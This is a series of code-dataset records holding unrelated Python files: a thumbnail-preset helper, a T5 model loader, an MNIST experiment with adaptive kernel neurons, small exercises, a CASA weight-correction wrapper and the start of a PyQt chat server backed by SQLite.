preset_name):\n    \"\"\"\n    
Compute picture information for a given preset defined in settings.\n\n    A preset is of the form:\n\n    \"default\": {\n        \"src\": {\"size\": (1000, 1000), \"crop\": \"smart\"}, # easythumbnail options\n        \"srcset\": [\n            {\n                \"options\": {\"size\": (800, 800), \"crop\": \"smart\"},\n                \"descriptor\": \"800w\",\n            },\n            {\n                \"options\": {\"size\": (600, 600), \"crop\": \"smart\"},\n                \"descriptor\": \"600w\",\n            },\n        ],\n        \"sizes\": \"100vw\", # e.g. 1000px or 100vw\n    }\n\n    \"\"\"\n    # Bail out if the picture does not have an image as that's the object we use to get\n    # all the information we need to return any picture info.\n    if not instance.picture:\n        return None\n\n    thumbnailer = instance.picture.easy_thumbnails_thumbnailer\n\n    # Look for the preset in settings and fallback to \"default\"\n    preset = SIMPLEPICTURE_PRESETS.get(preset_name, SIMPLEPICTURE_PRESETS[\"default\"])\n\n    # Complete picture information with thumbnails url calculated according to what is\n    # defined in the preset\n    picture_info = {}\n    location_dict = {\"subject_location\": instance.picture.subject_location}\n\n    # - src\n    options = preset[\"src\"].copy()\n    options.update(location_dict)\n    picture_info[\"src\"] = thumbnailer.get_thumbnail(options).url\n\n    # - srcset\n    srcset = []\n    for info in preset.get(\"srcset\", []):\n        options = info[\"options\"].copy()\n        options.update(location_dict)\n        url = thumbnailer.get_thumbnail(options).url\n        srcset.append(f\"{url:s} {info['descriptor']:s}\")\n    picture_info[\"srcset\"] = \", \".join(srcset) if srcset else None\n\n    # - sizes\n    picture_info[\"sizes\"] = preset.get(\"sizes\")\n\n    return picture_info\n","repo_name":"openfun/richie","sub_path":"src/richie/plugins/simple_picture/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"5250700746","text":"from .t5_relation_model import T5ForConditionalGeneration as T5_Relation_debug # handle relation attention by mimicking the processing flow of self.shard \nfrom transformers import T5ForConditionalGeneration as T5_Pretrained\nfrom transformers import AutoTokenizer, AutoConfig\n\n\ndef get_relation_t5_model(config, model_name_or_path):\n    if 'checkpoint' in model_name_or_path:\n        print(\"use relation model from checkpoint\")\n        model = T5_Relation_debug.from_pretrained(model_name_or_path)\n    else:\n        # return the t5 model modified to include relation information\n        my_config = config\n        model = T5_Relation_debug(config=my_config)\n\n        model_pretrained = T5_Pretrained.from_pretrained(model_name_or_path)\n        parameter_dict = model_pretrained.state_dict()\n        model_dict = model.state_dict()\n        model_dict.update(parameter_dict)\n        model.load_state_dict(model_dict)\n\n    return model \n\n\ndef get_pretrained_t5_model():\n    '''\n    return a t5-small model provided by huggingface transformers lib.\n    '''\n    model = T5_Pretrained.from_pretrained(\"t5-small\")\n\n    return model\n\n\n","repo_name":"shadowbringer1/text2sparql","sub_path":"seq2seq/model/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38811242877","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nimport torchvision\nfrom torchvision import transforms, datasets\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pl\nimport seaborn as sns\nimport gc\nsns.set_theme(style=\"whitegrid\")\n\nseed = 
272727\ntorch.manual_seed(seed)\nnp.random.seed(seed)\n\ngpu = True\nif gpu:\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n device = 'cuda'\nelse:\n torch.set_default_tensor_type(torch.FloatTensor)\n device = 'cpu'\n\n'''\nTrain an adaptive neuron. It starts as a triangle kernel and learns 'broader' representations.\n'''\n\ninput_size = 28 * 28\nnum_classes = 10\nnum_epochs = 100\nlr = 0.03\nmomentum = 0.9\nlearning = 0\n\nretest_rate = 10\n\nerror_threshold = 0.3\nnode = 0\ntri = 0\n'''\nbest widths\nn0t1 = 0.1 \nn1t1 = 0.075\nn0t0 = 0.1\nn1t0 = 0.025 but lots of n 0.05 also ok\n'''\n\n# parameter_settings = [0.075, 0.1, 0.125, 0.15]\n# parameter_settings = [0.04]\n# parameter_settings = [0.01, 0.025, 0.05, 0.075, 0.1, 0.125, 0.15, 0.175, 0.2, 0.3]\nparameter_settings = [0.1]\ncolours = pl.cm.gist_rainbow(np.linspace(0, 1, len(parameter_settings)))\n\n\ntest_label = \"2n{}t{} w{} et{} learning{}\".format(node, tri, parameter_settings, error_threshold, learning)\n\nbatch_size_train = 32\nbatch_size_test = 32\n\ntrainset = datasets.MNIST('', download=True, train=True, transform=transforms.ToTensor())\ntestset = datasets.MNIST('', download=True, train=False, transform=transforms.ToTensor())\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=batch_size_train,\n shuffle=True, generator=torch.Generator(device=device))\ntest_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size_test,\n shuffle=True, generator=torch.Generator(device=device))\n\n\nclass Triangle(nn.Module):\n def __init__(self, mean, std):\n super(Triangle, self).__init__()\n # self.mean = torch.nn.Parameter(mean)\n self.mean = mean\n self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n # self.std = torch.nn.Parameter(std)\n # self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n tout = torch.max(torch.tensor(0), 1 - torch.transpose(torch.abs(broadcast - x), 0, 1) / self.std.unsqueeze(1))\n # tout = torch.max(torch.tensor(0), 1 - torch.abs(broadcast - x) / self.std)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # tout = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return torch.transpose(tout, 0, 1)\n\nclass Gaussian(nn.Module):\n\n def __init__(self, mean=0, std=1):\n super(Gaussian, self).__init__()\n self.mean = torch.nn.Parameter(mean)\n # self.mean = mean\n # self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.stack([self.mean for i in range(len(x))])\n gauss = torch.exp((-(broadcast - x) ** 2)/(2 * self.std ** 2))\n # return torch.clamp(gauss, min=self.min, max=self.max)\n return gauss\n\nclass Node_Triangle(nn.Module):\n def __init__(self, mean, std):\n super(Node_Triangle, self).__init__()\n # self.mean = torch.nn.Parameter(mean)\n self.mean = mean\n # self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n self.std = std\n\n def forward(self, 
x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n tout = torch.max(torch.tensor(0), 1 - (torch.sum(torch.square(broadcast - x), dim=2) / input_size) / self.std)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # tout = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return tout\n\nclass Node_Gaussian(nn.Module):\n\n def __init__(self, mean=0, std=1):\n super(Node_Gaussian, self).__init__()\n self.mean = torch.nn.Parameter(mean)\n # self.mean = mean\n self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n # self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n gauss = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n # gauss = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # gauss = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return gauss\n\nclass Average_with_mask(nn.Module):\n def __init__(self, mask):\n super(Average_with_mask, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n denom = torch.sum(self.mask, -1, keepdim=True)\n out = torch.sum(torch.transpose(x, 0, 1) * self.mask, dim=2) / torch.transpose(denom, 0, 1)\n return torch.transpose(out, 0, 1)\n\n\n# Fully connected neural network with one hidden layer\nclass NeuralNet(nn.Module):\n def __init__(self, num_classes, centres, synapse_mask, output_errors, stdev, node=True, tri=True):\n super(NeuralNet, self).__init__()\n self.hidden_size = len(centres)\n self.synapse_mask = synapse_mask\n self.node = node\n\n if node:\n if tri:\n self.act_hidden = Node_Triangle(mean=centres, std=stdev)\n else:\n self.act_hidden = Node_Gaussian(mean=centres, std=stdev)\n else:\n if tri:\n self.act_hidden = Triangle(mean=centres, std=stdev)\n else:\n self.act_hidden = Gaussian(mean=centres, std=stdev)\n self.average_synapses = Average_with_mask(synapse_mask)\n self.act_out = Gaussian(mean=torch.ones(self.hidden_size), std=stdev)\n self.output_conn = nn.Linear(self.hidden_size, num_classes, bias=False)\n self.output_conn.weight.data = output_errors\n self.output_conn.weight.requires_grad = False\n # self.output_conn.bias.data = torch.zeros_like(self.output_conn.bias.data)\n # self.act_out = Gaussian(mean=torch.Tensor(1), std=stdev)\n # self.output_act = nn.LogSoftmax(dim=1)\n self.output_act = nn.Softmax(dim=1)\n\n def forward(self, x):\n batch_size = len(x)\n # out = self.input_conn(x)\n out = self.act_hidden(x, batch_size)\n if not self.node:\n out = self.average_synapses(out)\n out = self.act_out(out, batch_size)\n out = self.output_conn(torch.transpose(out, 0, 1))\n out = self.output_act(out)\n return out\n\ndef check_memory(where=''):\n print(where)\n t = torch.cuda.get_device_properties(0).total_memory\n r = torch.cuda.memory_reserved(0)\n a = torch.cuda.memory_allocated(0)\n f = r - a # free inside reserved\n print(\" total reserved allocated free\")\n 
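# each value below is a CUDA byte count, printed in scientific notation\n    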
print([\"{0:.4E}\".format(thing) for thing in [t, r, a, f]])\n\ndef make_network(new_centres, new_mask, errors, old_model=False):\n models = {}\n new_params = []\n if old_model:\n for width, m, new_c, new_m, e in zip(parameter_settings, old_model, new_centres, new_mask, errors):\n # check_memory(\"mn\")\n if not len(new_c):\n models['{}'.format(width)] = old_model['{}'.format(width)]\n new_params.append({'params': old_model['{}'.format(width)].parameters()})\n continue\n old_centres = old_model[m].act_hidden.mean\n old_weights = old_model[m].output_conn.weight.data\n old_mask = old_model[m].synapse_mask\n # check_memory(\"mnw\")\n models['{}'.format(width)] = NeuralNet(num_classes,\n centres=torch.vstack([old_centres, new_c]),\n synapse_mask=torch.vstack([old_mask, new_m]),\n output_errors=torch.hstack([old_weights, e]),\n node=node,\n tri=tri,\n stdev=width).to(device)\n # check_memory(\"mnn\")\n new_params.append({'params': models['{}'.format(width)].parameters()})\n # check_memory(\"mnp\")\n\n else:\n for width in parameter_settings:\n models['{}'.format(width)] = NeuralNet(num_classes,\n centres=new_centres,\n synapse_mask=new_mask,\n output_errors=errors,\n node=node,\n tri=tri,\n stdev=width).to(device)\n new_params.append({'params': models['{}'.format(width)].parameters()})\n\n # lossFunction = nn.NLLLoss(reduction='none')\n lossFunction = nn.CrossEntropyLoss(reduction='none')\n optimize_all = optim.SGD(new_params,\n lr=lr, momentum=momentum)\n return models, lossFunction, optimize_all\n\ndef neurogen_process(inputs, outputs, labels, loss):\n # centres = torch.stack([inputs for i in range(len(loss))])\n centres = inputs\n one_hot = torch.zeros([len(labels), num_classes])\n for i, l in enumerate(labels):\n one_hot[i, l] = 1\n errors = one_hot - torch.stack(outputs)\n triggered = (torch.max(torch.abs(errors), dim=2)[0] > error_threshold).nonzero(as_tuple=False)\n\n new_centres = [[] for i in range(len(loss))]\n new_errors = [[] for i in range(len(loss))]\n for [i, j] in triggered:\n new_centres[i].append(centres[j])\n new_errors[i].append(errors[i, j, :])\n mask = []\n for i in range(len(new_centres)):\n if len(new_centres[i]):\n new_centres[i] = torch.stack(new_centres[i])\n mask.append(torch.ones_like(new_centres[i]))\n new_errors[i] = torch.transpose(torch.stack(new_errors[i]), 0, 1)\n else:\n mask.append([])\n new_centres = new_centres\n new_errors = new_errors\n return new_centres, mask, new_errors\n\n\nfor images, labels in train_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n\n errors = torch.zeros([num_classes, batch_size_train])\n for i, l in enumerate(labels):\n errors[l, i] = 1\n\n models, lossFunction, optimize_all = make_network(new_centres=images,\n new_mask=torch.ones_like(images),\n errors=errors)\n break\n\ntraining_losses = []\ntesting_accuracies = []\n\nstop_growing = False\n\nfor epoch in range(num_epochs):\n check_memory(\"start\")\n\n print(test_label)\n processed_masks = []\n for p in models:\n models[p].train()\n loss_ = [0 for i in range(len(parameter_settings))]\n # with torch.no_grad():\n for batch, (images, labels) in enumerate(train_loader):\n # check_memory(\"batch\")\n print(\"Starting batch\", batch+1, \"/\", len(train_loader))\n if not batch and not epoch:\n continue\n images = images.reshape(-1, 784).to(torch.device(device))\n\n output = []\n for p in models:\n output.append(models[p](images))\n # check_memory(\"forward\")\n\n loss = []\n example_loss = []\n for out in output:\n loss_each = lossFunction(out, labels)\n 
example_loss.append(loss_each)\n loss.append(torch.mean(loss_each))\n # check_memory(\"loss\")\n\n optimize_all.zero_grad()\n\n if learning:# and epoch:\n for l in loss:\n l.backward()\n optimize_all.step()\n # check_memory(\"learning\")\n\n if not stop_growing and not epoch:\n centres, mask, errors = neurogen_process(images, output, labels, example_loss)\n # check_memory(\"process\")\n\n models, lossFunction, optimize_all = make_network(new_centres=centres,\n new_mask=mask,\n errors=errors,\n old_model=models)\n # check_memory(\"make\")\n if (batch-1) % retest_rate == 0:\n with torch.no_grad():\n for p in models:\n models[p].eval()\n correct = [0 for i in range(len(parameter_settings))]\n total = 0\n for images, labels in test_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n out = []\n for p in models:\n out.append(models[p](images))\n predicted = []\n for o in out:\n _, pred = torch.max(o, 1)\n predicted.append(pred)\n for i in range(len(parameter_settings)):\n correct[i] += (predicted[i] == labels).sum().item()\n total += labels.size(0)\n print(test_label)\n testing_accuracies.append(100 * np.array(correct) / total)\n for i in range(len(parameter_settings)):\n print('Testing accuracy: {} % {} n{}'.format(\n np.array(testing_accuracies).astype(float)[:, i],\n parameter_settings[i],\n models['{}'.format(parameter_settings[i])].hidden_size))\n # check_memory(\"loss2\")\n for i in range(len(parameter_settings)):\n loss_[i] += loss[i].detach()\n torch.cuda.empty_cache()\n\n for i in range(len(parameter_settings)):\n print(\"Epoch{}, Training loss:{} types:{}\".format(epoch,\n loss_[i] / len(train_loader),\n parameter_settings[i]))\n training_losses.append(loss_)\n\n # Testing\n with torch.no_grad():\n for p in models:\n models[p].eval()\n correct = [0 for i in range(len(parameter_settings))]\n total = 0\n for images, labels in test_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n out = []\n for p in models:\n out.append(models[p](images))\n predicted = []\n for o in out:\n _, pred = torch.max(o, 1)\n predicted.append(pred)\n for i in range(len(parameter_settings)):\n correct[i] += (predicted[i] == labels).sum().item()\n total += labels.size(0)\n print(test_label)\n for i in range(len(parameter_settings)):\n print('Testing accuracy: {} % {}'.format(100 * correct[i] / total, parameter_settings[i]))\n testing_accuracies.append(100 * np.array(correct) / total)\n\n if len(testing_accuracies) % 10 == 0:\n print(\"plotting\")\n plt.figure()\n for i, p, in enumerate(models):\n print(\"\\n\", np.max(np.array(testing_accuracies).astype(float)[:, i]), p, models[p].hidden_size, \"\\n\", np.array(testing_accuracies).astype(float)[:, i])\n plt.plot([x for x in range(len(np.array(testing_accuracies).astype(float)[:, i]))],\n np.array(testing_accuracies).astype(float)[:, i], label=p, color=colours[i])\n plt.ylim([85, 100])\n plt.xlabel('epoch')\n plt.ylabel('test accuracy')\n plt.legend(loc='lower right')\n figure = plt.gcf()\n figure.set_size_inches(16, 9)\n plt.tight_layout(rect=[0, 0.3, 1, 0.95])\n plt.suptitle(test_label, fontsize=16)\n plt.grid(visible=None, which='both')\n plt.savefig(\"./plots/{}.png\".format(test_label), bbox_inches='tight', dpi=200, format='png')\n plt.close()\n\n print(\"done plotting\")\n\n# torch.save(model, 'mnist_model.pt')\nprint(\"training:\")\nfor i, p, in enumerate(models):\n print(p, np.array(training_losses).astype(float)[:, i])\n# print(training_losses)\nprint(\"testing\")\n\nplt.figure()\nfor i, p, in enumerate(models):\n 
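# one test-accuracy curve per kernel-width setting\n    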
print(\"\\n\", p, \"\\n\", np.array(testing_accuracies).astype(float)[:, i])\n plt.plot([x for x in range(len(np.array(testing_accuracies).astype(float)[:, i]))],\n np.array(testing_accuracies).astype(float)[:, i], label=p, color=colours[i])\nplt.ylim([95, 100])\nplt.xlabel('epoch')\nplt.ylabel('test accuracy')\nplt.legend(loc='lower right')\nfigure = plt.gcf()\nfigure.set_size_inches(16, 9)\nplt.tight_layout(rect=[0, 0.3, 1, 0.95])\nplt.suptitle(test_label, fontsize=16)\nplt.savefig(\"./plots/{}.png\".format(test_label), bbox_inches='tight', dpi=200, format='png')\nplt.close()\n# print(testing_accuracies)\n\nprint('done')","repo_name":"adamgoodtime/neural_soup","sub_path":"small_experiments/neural_act.py","file_name":"neural_act.py","file_ext":"py","file_size_in_byte":18026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707062919","text":"# coding:utf8\n\n# lib2.py\n\n\nclass Triangle(object):\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def get_Area(self):\n a, b, c = self.a, self.b, self.c\n p = (a + b + c) / 2\n area = (p * (p - a) * (p - b) * (p - c)) * 0.5\n return area\n\n\n","repo_name":"zhwl934008411/Python-Advanced-Programing","sub_path":"index7/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3674046016","text":"####################################################################################################\n\n# run statwt for cycle 2 data\n#############################\n\n\ndef correct_weights(MS_file, linefree):\n\n \"\"\"\n Correct the weights in cycle 2 data. Back then the weights were not meaningful.\n \"\"\"\n\n casalog.post(\"*\"*80)\n casalog.post(\"FUNCTION: CORRECT WEIGHTS\")\n casalog.post(\"*\"*80)\n\n # expand * because statwt cannot deal with all spws\n casalog.post(\" * expanding '*' in linefree range\")\n linefree_corrected = expand_spw_string(MS_file, linefree)\n\n\n casalog.post(\"*\"*80)\n casalog.post(\"* Getting weights from this range: \"+str(linefree))\n casalog.post(\"* which translates to: \"+str(linefree_corrected))\n casalog.post(\"*\"*80)\n\n # run statwt\n statwt(vis = MS_file,\n dorms = False,\n fitspw = linefree_corrected,\n combine = 'spw',\n minsamp = 2 # default\n )\n\n####################################################################################################\n","repo_name":"GiantMolecularCloud/NGC253-imaging","sub_path":"calibration_pipeline/correct_weights.py","file_name":"correct_weights.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25432958371","text":"#Name: Gabriel N Sa\n#09.07.2018\n#Desciption - Basic if statement test.\n\n#Getting temperature values:\ndef get_values():\n temperature = float(input('Enter the temperature in Celcius: '))\n return temperature\n\n#Checking temperature:\ndef check_temperature(temperature):\n if(temperature > 35):\n print(\"It's very hot!\")\n elif(temperature > 28 and temperature <= 35):\n print(\"It's hot!\") \n elif(temperature > 20 and temperature <= 28):\n print(\"It's nice!\")\n elif(temperature > 10 and temperature <= 20):\n print(\"It's cold\")\n else:\n print(\"It's very cold\")\n\n#Check the exit condition:\ndef check_exit_condition():\n option = input(\"Type 's' if you want to finish the program: \")\n print()\n if(option == 's'):\n return False\n else:\n 
        return True\n\n#Main function:\nloop = True\nwhile loop:\n    temperature = get_values()\n    check_temperature(temperature)\n    loop = check_exit_condition()\n\n","repo_name":"gabrielnsa/Exercises","sub_path":"if_statement1.py","file_name":"if_statement1.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38339704701","text":"from ClientListDialog import Ui_ClientListDialog\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtGui import QColor\r\nimport subprocess\r\nimport threading\r\nimport datetime\r\nimport sqlite3\r\nimport socket\r\nimport codecs\r\nimport time\r\nimport sys\r\nimport os\r\n\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ndef killPort(port):\r\n\tfind_port = 'netstat -aon | findstr %s' % port\r\n\tresult = os.popen(find_port)\r\n\ttext = result.read()\r\n\ttext = [i.split(' ') for i in text.split('\\n') if i]\r\n\tpids = []\r\n\tfor i in text:\r\n\t\tpid = [u for u in i if u]\r\n\t\tif str(port) in pid[1]:\r\n\t\t\tpids.append(pid[-1])\r\n\tpids = list(set(pids))\r\n\tfor pid in pids:\r\n\t\tfind_kill = 'taskkill -f -pid %s' % pid\r\n\t\tresult = os.popen(find_kill)\r\n\r\nclass MyClientListDialog(QtWidgets.QDialog, Ui_ClientListDialog):\r\n\tdef __init__(self, clientTableName, onlineList):\r\n\t\tsuper().__init__()\r\n\t\tself.setupUi(self, clientTableName, onlineList)\r\n\r\nclass Ui_ServerWD(object):\r\n\tdef showClientList(self):\r\n\t\tdialog = MyClientListDialog(self.clientTableName, self.nicknames)\r\n\t\tdialog.exec_()\r\n\r\n\tdef closeEvent(self, event):\r\n\t\tclose = QMessageBox()\r\n\t\tclose.setWindowTitle(\"Close\")\r\n\t\tclose.setText(\"Are you sure?\")\r\n\t\tclose.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\r\n\t\tclose = close.exec()\r\n\t\tif close == QMessageBox.Yes:\r\n\t\t\tself.runnable = False\r\n\t\t\tserver.close()\r\n\t\t\tevent.accept()\r\n\t\telse:\r\n\t\t\tevent.ignore()\r\n\r\n\tdef setCurrentTime(self):\r\n\t\twhile True:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.date = currentTime.strftime(\"%d/%m/%Y\")\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.dateLB.setText(self.date)\r\n\t\t\tself.timeLB.setText(self.time)\r\n\r\n\tdef changeTrackingFlag(self):\r\n\t\tif self.trackingFlag == True:\r\n\t\t\tself.trackingFlag = False\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tself.reportTE.append(\"Tracking is off!\")\r\n\t\telse:\r\n\t\t\tself.trackingFlag = True\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tself.reportTE.append(\"Tracking is on!\")\r\n\r\n\tdef changeRecordingFlag(self):\r\n\t\tself.recordingFlag += 1\r\n\t\tif self.recordingFlag % 2 == 0:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.setTextColor(QColor(30, 255, 0))\r\n\t\t\tself.reportTE.append(self.time + \": Stop record!\")\r\n\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\tself.reportTE.append(\"Record saving in: \" + self.recordName)\r\n\t\t\tself.recordBT.setToolTip('Start tracking the conversation in chat room')\r\n\t\telse:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.setTextColor(QColor(30, 255, 0))\r\n\t\t\tself.reportTE.append(self.time + \": Start record!\")\r\n\t\t\tself.recordName = str(currentTime.strftime(\"%d-%m-%Y\")) + \"-\" + 
str(self.ip) + \"-\" + str(self.port) + \".txt\"\r\n\t\t\tself.recordBT.setToolTip('Stop tracking the conversation in chat room')\r\n\r\n\tdef IPTransform(self):\r\n\t\ts = \"\"\r\n\t\tfor i in range(len(self.ip)):\r\n\t\t\tif (self.ip[i] == \".\"):\r\n\t\t\t\ts += \"_\"\r\n\t\t\telse:\r\n\t\t\t\ts += self.ip[i]\r\n\t\treturn s\r\n\r\n\tdef getNickname_Message(self, msg):\r\n\t\tindex = 0\r\n\t\tfor i in range(len(msg)):\r\n\t\t\tif msg[i] == \":\":\r\n\t\t\t\tindex = i\r\n\t\t\t\tbreak\r\n\t\treturn msg[:index], msg[index + 1:len(msg)]\r\n\r\n\tdef getRowCount(self, cur):\r\n\t\tcount = 0\r\n\t\tfor row in enumerate(cur):\r\n\t\t\tcount += 1\r\n\t\treturn count\r\n\r\n\tdef getMessageCount(self):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tsql = \"SELECT MAX(no) FROM \" + self.messageTableName + \";\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcount = 0\r\n\t\tfor n, row in enumerate(cur):\r\n\t\t\tfor m, col in enumerate(row):\r\n\t\t\t\tcount = int(col)\r\n\t\tcon.close()\r\n\t\treturn count\r\n\r\n\tdef createData(self):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tip = self.IPTransform()\r\n\t\tsql = \"CREATE TABLE IF NOT EXISTS \" + self.clientTableName + \" (no INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, nickname TEXT);\"\r\n\t\tcur = con.cursor()\r\n\t\tcur.execute(sql)\r\n\t\tsql = \"CREATE TABLE IF NOT EXISTS \" + self.messageTableName + \" (no INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, datetime datetime, nickname TEXT, message TEXT);\"\r\n\t\tcur.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef addMessage(self, message):\r\n\t\tip = self.IPTransform()\r\n\t\tnickname, msg = self.getNickname_Message(message)\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tsql = \"INSERT INTO \" + self.messageTableName + \" (datetime, nickname, message) VALUES ('\" + self.date + \" \" + self.time + \"', '\" + nickname + \"', '\" + msg + \"');\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef addNickname(self, client, nickname):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tip = self.IPTransform()\r\n\t\tsql = \"SELECT nickname FROM \" + self.clientTableName + \" WHERE nickname = '\" + nickname + \"';\"\r\n\t\tcur = con.execute(sql)\r\n\t\tif self.getRowCount(cur) != 0:\r\n\t\t\tif (self.getMessageCount() > 10):\r\n\t\t\t\tsql = \"SELECT * FROM \" + self.messageTableName + \" WHERE no > \" + str(self.getMessageCount() - 10) + \";\"\r\n\t\t\telse:\r\n\t\t\t\tsql = \"SELECT * FROM \" + self.messageTableName + \";\"\r\n\t\t\tcur = con.execute(sql)\r\n\t\t\tclient.send(\"LOAD:Loading last chat!\".encode(\"utf-8\"))\r\n\t\t\ttime.sleep(1)\r\n\t\t\tfor n, row in enumerate(cur):\r\n\t\t\t\tdatetime = \"\"\r\n\t\t\t\tnkname = \"\"\r\n\t\t\t\tmessage = \"\"\r\n\t\t\t\tfor m, col in enumerate(row):\r\n\t\t\t\t\tif m == 1:\r\n\t\t\t\t\t\tdatetime = str(col)\r\n\t\t\t\t\tif m == 2:\r\n\t\t\t\t\t\tnkname = str(col)\r\n\t\t\t\t\tif m == 3:\r\n\t\t\t\t\t\tmessage = str(col)\r\n\t\t\t\tmsg = \"LOAD:\" + datetime + \": \" + nkname + \": \" + message\r\n\t\t\t\tclient.send(msg.encode(\"utf-8\"))\r\n\t\t\t\ttime.sleep(0.25)\r\n\t\telse:\r\n\t\t\tsql = \"INSERT INTO \" + self.clientTableName + \" (nickname) VALUES ('\" + nickname + \"');\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef broadcast(self, message, typeMSG, client = None):\r\n\t\tif self.trackingFlag == True and typeMSG == 0:\r\n\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = 
